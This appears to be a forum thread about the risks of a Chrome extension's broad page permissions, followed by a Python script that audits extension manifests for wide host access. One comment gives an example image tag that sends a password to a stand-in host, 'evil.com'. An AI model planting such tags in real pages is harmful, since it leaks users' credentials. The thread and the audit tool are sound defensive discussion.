
I was overjoyed by this, and then I saw the permissions: "it can read and change all data on websites you visit".

I _think_ that means it can send all of my passwords offsite, or do plugins need a separate permission to phone home?

https://security.stackexchange.com/questions/15259/worst-cas...



Even if the plugin couldn't phone home directly, if they have the power to change the HTML of the page, they can insert <img src="http://evil.com/phonehome?yourpassword=whatever"> and phone home that way. There's no permission that lets a plugin modify pages while preventing it from inserting tags that cause new requests.

The plugin's code is probably quite short - maybe you could inspect it yourself, manually?


Problem is, extensions silently update in the background. They are frequently sold to adware companies, and then malicious scripts are added without the user's knowledge.


Hadn't done this before, but it's trivial to manually load the plugin[1] from the cloned git repo[2].

It's a bit disappointing that Chrome doesn't let you sandbox things well enough to install plugins safely; there's no reason that plugins should be allowed to transmit data without asking for permission.

[1]: https://developer.chrome.com/extensions/getstarted
[2]: https://github.com/jswanner/DontFuckWithPaste
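The thread's point is that "read and change all data on websites you visit" is really host access to every origin, and that once an extension has that, nothing stops it from inserting a tag that makes an outbound request. Before loading an unpacked extension from a cloned repo, the cheapest check is to read its manifest.json and see how wide that host access is. The script below is an added example, not code from this thread or from the DontFuckWithPaste project; it reads the real manifest keys Chrome uses (`permissions` and `content_scripts[].matches` in Manifest V2, `host_permissions` in Manifest V3) and flags any match pattern that reaches every host. The two manifests embedded in it are constructed for illustration.

```python
"""Audit a Chrome extension manifest for host access broad enough to
read or change every page the user visits.

Added example, not from the thread or the DontFuckWithPaste project.
The two manifests at the bottom are constructed for illustration."""
import json
from pathlib import Path

# Match patterns that grant access to every origin (or every origin on a scheme).
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*", "file:///*"}

# API permissions that widen what a script with page access can do or observe.
RISKY_API_PERMISSIONS = {"webRequest", "webRequestBlocking", "tabs",
                         "scripting", "cookies", "debugger", "proxy"}


def host_patterns(manifest: dict) -> list:
    """Collect every match pattern the manifest uses for host access:
    URL-shaped entries in MV2 'permissions', MV3 'host_permissions',
    and the 'matches' list of each content script."""
    patterns = []
    for p in manifest.get("permissions", []):
        if "://" in p or p == "<all_urls>":
            patterns.append(p)
    patterns.extend(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    return patterns


def is_broad(pattern: str) -> bool:
    """True if the pattern reaches every host on at least one scheme.
    Covers the well-known forms and any pattern whose host part is a bare '*'
    (e.g. 'https://*/login*' still matches every https host)."""
    if pattern in BROAD_PATTERNS:
        return True
    _scheme, _sep, rest = pattern.partition("://")
    host = rest.split("/", 1)[0]
    return host == "*"


def audit(manifest: dict) -> dict:
    """Summarise the manifest's reach. Returns the broad host patterns,
    the host patterns scoped to specific sites, and any risky API permissions."""
    patterns = host_patterns(manifest)
    api_perms = [p for p in manifest.get("permissions", []) if "://" not in p]
    return {
        "manifest_version": manifest.get("manifest_version"),
        "broad_hosts": [p for p in patterns if is_broad(p)],
        "scoped_hosts": [p for p in patterns if not is_broad(p)],
        "risky_permissions": sorted(set(api_perms) & RISKY_API_PERMISSIONS),
    }


def audit_unpacked(extension_dir: str) -> dict:
    """Audit an unpacked extension directory (the kind loaded via
    'Load unpacked') by reading its manifest.json."""
    manifest = json.loads(Path(extension_dir, "manifest.json").read_text())
    return audit(manifest)


# Constructed MV2 manifest: matches every page and can watch requests.
BROAD_MANIFEST = {
    "manifest_version": 2,
    "name": "example-broad",
    "permissions": ["activeTab", "storage", "webRequest", "<all_urls>"],
    "content_scripts": [{"matches": ["http://*/*", "https://*/*"],
                         "js": ["content.js"]}],
}

# Constructed MV3 manifest: only runs on one site, plus activeTab on demand.
SCOPED_MANIFEST = {
    "manifest_version": 3,
    "name": "example-scoped",
    "permissions": ["activeTab", "storage"],
    "host_permissions": ["*://*.example.com/*"],
    "content_scripts": [{"matches": ["https://*.example.com/*"],
                         "js": ["content.js"]}],
}

if __name__ == "__main__":
    for m in (BROAD_MANIFEST, SCOPED_MANIFEST):
        print(m["name"], json.dumps(audit(m), indent=2))
```

Run it against the cloned repo with `audit_unpacked("/path/to/DontFuckWithPaste")` after loading it unpacked. A non-empty `broad_hosts` list is exactly what produces the "all websites you visit" prompt; an extension that only needs to act on the current tab when clicked can usually ask for `activeTab` instead, which grants access to that one page only after a user gesture, and a content script can be restricted with narrower `matches`. The audit does not prove an extension is safe (the thread's warning about silent updates still applies), but it tells you how much damage an update could do.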



